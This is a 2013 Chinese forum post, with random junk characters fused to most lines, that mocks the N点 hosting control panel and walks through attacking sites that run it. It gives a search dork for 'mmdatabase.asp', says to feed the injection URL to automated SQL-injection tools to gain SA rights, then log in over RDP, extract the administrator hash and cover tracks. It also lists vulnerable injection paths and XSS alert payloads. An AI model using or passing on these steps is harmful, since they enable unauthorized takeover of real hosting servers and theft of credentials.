不得不说N点实在是一个破东西3 T7 A2 v- u9 r( b1 N5 b/ Q
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂# @, Y& a: B. y& u9 a( K
好吧 抱怨一下就行了 接下来关键的时候到了' h+ m- t w" c5 e" y
首先百度搜索关键字:inurl: (mmdatabase.asp)5 ]" @& k; W" }8 Q0 W- k
我随便列举一个: www.xxxx.com) y+ B* y/ j, n( M1 L
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
# H+ u: D6 c Y! w# a扔入NBSI 或者啊D等各种傻逼工具后2 B0 b$ z3 j. H! ?
你们会看到是SA权限 N: k' S S4 w1 S- L- R" I; R1 r* ?- E
果断3389 上去 hash得到administrator密码
- Y3 ?& S( c9 _8 L ~7 X& A擦屁股走人~! M m! ?' Z8 x* Z. D
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
. P- H% L9 Y0 R" H3 k , m/ Y" j8 W) ?5 G& l) l
再附上其他几个漏洞页面
# _: `. ~ R- @& _SQL:
! [* V& A2 E5 H2 Q6 c1 e. E+ U# ~% ~http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
$ i8 ~) d1 e) y- D% T( J v2 Ahttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11( j: L+ p! j' l
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9& a- }8 @+ R6 q" m
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=27 r6 x+ S9 w5 u- y5 c) ^! Y: B
XSS证明:
& g1 V9 h2 Q( u; nhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”+ w2 u( v2 K" I- N. j% l' o
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”7 m" K$ m9 w) w$ t" |
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script># x% ], o9 p8 [5 G' _
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
7 }* T' n& r l" `, x5 a还是星外吧 你们懂的7 |) M( x% |* q, T
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?$ w5 N+ u+ {, K6 K. L# o9 B
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
8 L! b/ }4 |5 |' k4 B; X3 d——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对